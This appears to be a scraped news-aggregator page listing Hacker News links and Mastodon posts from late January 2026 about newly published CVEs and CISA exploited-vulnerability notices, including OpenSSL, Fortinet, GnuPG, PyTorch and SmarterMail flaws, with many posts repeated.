----------------------------------------
πŸ”– Title: 430k-year-old well-preserved wooden tools are the oldest ever found
πŸ”— URL: nytimes.com/2026/01/26/science
πŸ‘ Score: [212]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Xfwl4 – The Roadmap for a Xfce Wayland Compositor
πŸ”— URL: alexxcons.github.io/blogpost_1
πŸ‘ Score: [211]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Velox: A Port of Tauri to Swift by Miguel de Icaza
πŸ”— URL: github.com/velox-apps/velox
πŸ‘ Score: [161]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Snow Simulation Toy
πŸ”— URL: potch.me/2026/snow-simulation-
πŸ‘ Score: [150]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: SoundCloud Data Breach Now on HaveIBeenPwned
πŸ”— URL: haveibeenpwned.com/Breach/Soun
πŸ‘ Score: [81]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: A simulation where life unfolds in real time
πŸ”— URL: soupof.life
πŸ‘ Score: [78]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Lennart Poettering, Christian Brauner founded a new company
πŸ”— URL: amutable.com/about
πŸ‘ Score: [74]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Prism
πŸ”— URL: openai.com/index/introducing-p
πŸ‘ Score: [64]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: A first look at Aperture by Tailscale (private alpha)
πŸ”— URL: tailscale.com/blog/aperture-pr
πŸ‘ Score: [62]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
πŸ”— URL: openssl-library.org/news/vulne
πŸ‘ Score: [53]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Doing the thing is doing the thing
πŸ”— URL: softwaredesign.ing/blog/doing-
πŸ‘ Score: [53]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Flexible use of a multi-purpose tool by a cow
πŸ”— URL: doi.org/10.1016/j.cub.2025.11.
πŸ‘ Score: [48]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Two Twisty Shapes Resolve a Centuries-Old Topology Puzzle
πŸ”— URL: quantamagazine.org/two-twisty-
πŸ‘ Score: [40]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: AI2: Open Coding Agents
πŸ”— URL: allenai.org/blog/open-coding-a
πŸ‘ Score: [27]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: One Human and One Agent = One Browser from Scratch
πŸ”— URL: simonwillison.net/2026/Jan/27/
πŸ‘ Score: [25]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Clawdbot Renames to Moltbot
πŸ”— URL: github.com/moltbot/moltbot/com
πŸ‘ Score: [19]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------

##

hn50@social.lansky.name at 2026-01-27T19:55:07.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

Link: openssl-library.org/news/vulne
Discussion: news.ycombinator.com/item?id=4

##

jschauma@mstdn.social at 2026-01-27T18:27:05.000Z ##

OpenSSL Security Advisory

openssl-library.org/news/secad

One high, one medium, and 9 low severity issues.

The high severity is a stack buffer overflow in CMS AuthEnvelopedData parsing (CVE-2025-15467): attacker provides an oversized IV, leading to buffer overflow prior to authentication, possibly leading to remote code execution if you're parsing untrusted CMS or PKCS#7 content with AEAD (e.g., AES-GCM).

##

newsycombinator@framapiaf.org at 2026-01-27T18:00:44.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: openssl-library.org/news/vulne
Comments: news.ycombinator.com/item?id=4

##

ycombinator@rss-mstdn.studiofreesia.com at 2026-01-27T17:21:05.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
openssl-library.org/news/vulne
#ycombinator

##

CuratedHackerNews@mastodon.social at 2026-01-27T17:14:04.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

openssl-library.org/news/vulne

##

hnbot@chrispelli.fun at 2026-01-27T17:09:42.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing - openssl-library.org/news/vulne

#hackernews

##

h4ckernews@mastodon.social at 2026-01-27T17:09:12.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

openssl-library.org/news/vulne

#HackerNews

##

hn50@social.lansky.name at 2026-01-27T19:55:07.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

Link: openssl-library.org/news/vulne
Discussion: news.ycombinator.com/item?id=4

##

jschauma@mstdn.social at 2026-01-27T18:27:05.000Z ##

OpenSSL Security Advisory

openssl-library.org/news/secad

One high, one medium, and 9 low severity issues.

The high severity is a stack buffer overflow in CMS AuthEnvelopedData parsing (CVE-2025-15467): attacker provides an oversized IV, leading to buffer overflow prior to authentication, possibly leading to remote code execution if you're parsing untrusted CMS or PKCS#7 content with AEAD (e.g., AES-GCM).

##

newsycombinator@framapiaf.org at 2026-01-27T18:00:44.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: openssl-library.org/news/vulne
Comments: news.ycombinator.com/item?id=4

##

ycombinator@rss-mstdn.studiofreesia.com at 2026-01-27T17:21:05.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
openssl-library.org/news/vulne
#ycombinator

##

CuratedHackerNews@mastodon.social at 2026-01-27T17:14:04.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

openssl-library.org/news/vulne

##

h4ckernews@mastodon.social at 2026-01-27T17:09:12.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

openssl-library.org/news/vulne

#HackerNews

##

CVE-2026-24837
(7.6 HIGH)

EPSS: 0.00%

updated 2026-01-28T00:15:51.050000

2 posts

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during some module operations in the Persona Bar. Versions 9.13.10 and 10.2.0 contain a fix for the issue.

thehackerwire@mastodon.social at 2026-01-28T00:46:39.000Z ##

🟠 CVE-2026-24837 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T00:46:39.000Z ##

🟠 CVE-2026-24837 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24836
(7.6 HIGH)

EPSS: 0.00%

updated 2026-01-28T00:15:50.910000

2 posts

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include scripts that would run in the PersonaBar when displayed. Versions 9.13.10 and 10.2.0 contain a fix for the issue.

thehackerwire@mastodon.social at 2026-01-28T00:51:52.000Z ##

🟠 CVE-2026-24836 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include script...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T00:51:52.000Z ##

🟠 CVE-2026-24836 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include script...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24833
(7.6 HIGH)

EPSS: 0.00%

updated 2026-01-28T00:15:50.773000

2 posts

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will run for user in the Persona Bar. Versions 9.13.10 and 10.2.0 contain a fix for the issue.

thehackerwire@mastodon.social at 2026-01-28T00:47:01.000Z ##

🟠 CVE-2026-24833 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T00:47:01.000Z ##

🟠 CVE-2026-24833 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23830
(10.0 CRITICAL)

EPSS: 0.00%

updated 2026-01-28T00:15:50.170000

2 posts

SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Function` constructor with a safe, sandboxed version (`SandboxFunction`). This is handled in `utils.ts` by mapping `Function` to `sandboxFunction` within a m

thehackerwire@mastodon.social at 2026-01-28T00:46:49.000Z ##

πŸ”΄ CVE-2026-23830 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Func...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T00:46:49.000Z ##

πŸ”΄ CVE-2026-23830 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Func...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67645
(8.8 HIGH)

EPSS: 0.00%

updated 2026-01-28T00:15:49.770000

2 posts

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request parameters (pubpid / pid) to reference another user’s record; the server accepts the modified IDs and applies the changes to that other user’s profile. This all

thehackerwire@mastodon.social at 2026-01-28T00:52:12.000Z ##

🟠 CVE-2025-67645 - High (8.8)

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request paramet...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T00:52:12.000Z ##

🟠 CVE-2025-67645 - High (8.8)

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request paramet...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-55292
(8.2 HIGH)

EPSS: 0.00%

updated 2026-01-28T00:15:49.607000

2 posts

Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by abusing the HAM mode which doesn't use encryption. An attacker can, as such, forge a NodeInfo on behalf of a victim node advertising that the HAM mode i

thehackerwire@mastodon.social at 2026-01-28T00:52:01.000Z ##

🟠 CVE-2025-55292 - High (8.2)

Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T00:52:01.000Z ##

🟠 CVE-2025-55292 - High (8.2)

Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24858
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T22:15:58.067000

7 posts

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.

DarkWebInformer at 2026-01-28T00:01:39.854Z ##

‼️CVE-2026-24858: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability

Severity: Critical
CVSS: 9.8
Zero Day: Yes
CVE Published: January 27th, 2026

Advisory: github.com/advisories/GHSA-2x3

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.6.0 through 7.6.5, FortiOS 7.4.0 through 7.4.10, FortiOS 7.2.0 through 7.2.12, FortiOS 7.0.0 through 7.0.18 may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.

##

secdb at 2026-01-28T00:00:19.472Z ##

🚨 [CISA-2026:0127] CISA Adds One Known Exploited Vulnerability to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-24858 (secdb.nttzen.cloud/cve/detail/)
- Name: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Fortinet
- Product: Multiple Products
- Notes: Please adhere to Fortinet's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Fortinet products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as they become available. For more information please see: fortiguard.fortinet.com/psirt/ ; fortinet.com/blog/psirt-blogs/ ; nvd.nist.gov/vuln/detail/CVE-2

##

undercodenews@mastodon.social at 2026-01-27T23:44:47.000Z ##

Fortinet Confirms Actively Exploited Critical FortiCloud SSO Zero-Day (CVE-2026-24858)

A New Authentication Bypass Shakes Fortinet’s Security Ecosystem Fortinet has confirmed the active exploitation of a previously unknown, critical authentication bypass vulnerability affecting its FortiCloud single sign-on (SSO) infrastructure. Tracked as CVE-2026-24858, the flaw allows attackers to gain unauthorized administrative access to Fortinet devices across different customer…

undercodenews.com/fortinet-con

##

defendopsdiaries at 2026-01-27T23:33:00.834Z ##

A single flaw in FortiCloud SSO let hackers jump from their own accounts straight into other companies’ networks, creating admin access in seconds. How did this happen and what does it mean for SSO security everywhere?

thedefendopsdiaries.com/anatom

##

thehackerwire@mastodon.social at 2026-01-27T20:17:52.000Z ##

πŸ”΄ CVE-2026-24858 - Critical (9.8)

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

DarkWebInformer@infosec.exchange at 2026-01-28T00:01:39.000Z ##

‼️CVE-2026-24858: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability

Severity: Critical
CVSS: 9.8
Zero Day: Yes
CVE Published: January 27th, 2026

Advisory: github.com/advisories/GHSA-2x3

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.6.0 through 7.6.5, FortiOS 7.4.0 through 7.4.10, FortiOS 7.2.0 through 7.2.12, FortiOS 7.0.0 through 7.0.18 may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.

##

thehackerwire@mastodon.social at 2026-01-27T20:17:52.000Z ##

πŸ”΄ CVE-2026-24858 - Critical (9.8)

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24778
(8.8 HIGH)

EPSS: 0.00%

updated 2026-01-27T22:15:57.097000

2 posts

Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaScript with the victim's permissions, potentially leading to account takeover. Ghost Portal versions 2.29.1 through 2.51.4 and 2.52.0 through 2.57.0 were v

thehackerwire@mastodon.social at 2026-01-27T23:00:52.000Z ##

🟠 CVE-2026-24778 - High (8.8)

Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaSc...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T23:00:52.000Z ##

🟠 CVE-2026-24778 - High (8.8)

Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaSc...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24765
(7.8 HIGH)

EPSS: 0.00%

updated 2026-01-27T22:15:56.790000

4 posts

PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists in the `cleanupForCoverage()` method, which deserializes code coverage files without validation, potentially allowing remote code execution if malicious `

thehackerwire@mastodon.social at 2026-01-27T23:02:16.000Z ##

🟠 CVE-2026-24765 - High (7.8)

PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists i...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

sebastian@phpc.social at 2026-01-27T15:27:14.000Z ##

RE: phpc.social/@sebastian/1159657

This is CVE-2026-24765 now.

##

thehackerwire@mastodon.social at 2026-01-27T23:02:16.000Z ##

🟠 CVE-2026-24765 - High (7.8)

PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists i...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

sebastian@phpc.social at 2026-01-27T15:27:14.000Z ##

RE: phpc.social/@sebastian/1159657

This is CVE-2026-24765 now.

##

CVE-2025-59106
(8.8 HIGH)

EPSS: 0.01%

updated 2026-01-27T21:32:51

2 posts

The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabilities it is possible to directly execute commands with highest privileges.

thehackerwire@mastodon.social at 2026-01-27T21:51:56.000Z ##

🟠 CVE-2025-59106 - High (8.8)

The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabi...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:51:56.000Z ##

🟠 CVE-2025-59106 - High (8.8)

The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabi...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-21589
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T21:31:56

4 posts

An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allows a network-based attacker to bypass authentication and take administrative control of the device. This issue affects Session Smart Router:Β  * from 5.6.7 before 5.6.17,Β  * from 6.0 before 6.0.8 (affected from 6.0.8), * from 6.1 before 6.1.12-lts,Β  * from 6.2

thehackerwire@mastodon.social at 2026-01-27T21:53:32.000Z ##

πŸ”΄ CVE-2025-21589 - Critical (9.8)

An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.

This issue affects Sess...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:51:55.000Z ##

πŸ”΄ CVE-2025-21589 - Critical (9.8)

An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.

This issue affects Sess...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:53:32.000Z ##

πŸ”΄ CVE-2025-21589 - Critical (9.8)

An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.

This issue affects Sess...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:51:55.000Z ##

πŸ”΄ CVE-2025-21589 - Critical (9.8)

An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.

This issue affects Sess...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24881
(8.1 HIGH)

EPSS: 0.00%

updated 2026-01-27T21:31:49

2 posts

In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of service; however, there is also memory corruption that could lead to remote code execution.

thehackerwire@mastodon.social at 2026-01-27T19:29:52.000Z ##

🟠 CVE-2026-24881 - High (8.1)

In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of serv...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T19:29:52.000Z ##

🟠 CVE-2026-24881 - High (8.1)

In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of serv...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24747
(8.8 HIGH)

EPSS: 0.00%

updated 2026-01-27T20:10:54

2 posts

### Summary A vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., weights_only=True)`, can corrupt memory and potentially lead to arbitrary code execution. ### Vulnerability Details The `weights_only=True` unpickler failed to properly validate pickle opcodes and storage metadata, allowing:

thehackerwire@mastodon.social at 2026-01-27T23:02:06.000Z ##

🟠 CVE-2026-24747 - High (8.8)

PyTorch is a Python package that provides tensor computation. Prior to version 2.10.0, a vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., w...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T23:02:06.000Z ##

🟠 CVE-2026-24747 - High (8.8)

PyTorch is a Python package that provides tensor computation. Prior to version 2.10.0, a vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., w...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24882
(8.4 HIGH)

EPSS: 0.00%

updated 2026-01-27T19:16:16.670000

2 posts

In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.

thehackerwire@mastodon.social at 2026-01-27T19:30:02.000Z ##

🟠 CVE-2026-24882 - High (8.4)

In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T19:30:02.000Z ##

🟠 CVE-2026-24882 - High (8.4)

In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23760
(9.8 CRITICAL)

EPSS: 51.37%

updated 2026-01-27T18:33:14

3 posts

SmarterTools SmarterMail versions prior to build 9511 contain an authentication bypass vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can supply a target administrator username and a new password to reset the acc

Nuclei template

1 repos

#search_error

DarkWebInformer@infosec.exchange at 2026-01-27T00:27:16.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

##

cisakevtracker@mastodon.social at 2026-01-26T21:01:38.000Z ##

CVE ID: CVE-2026-23760
Vendor: SmarterTools
Product: SmarterMail
Date Added: 2026-01-26
Notes: smartertools.com/smartermail/r ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2026-01-26T20:03:53.000Z ##

CISA has updated the KEV catalogue.

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2025-

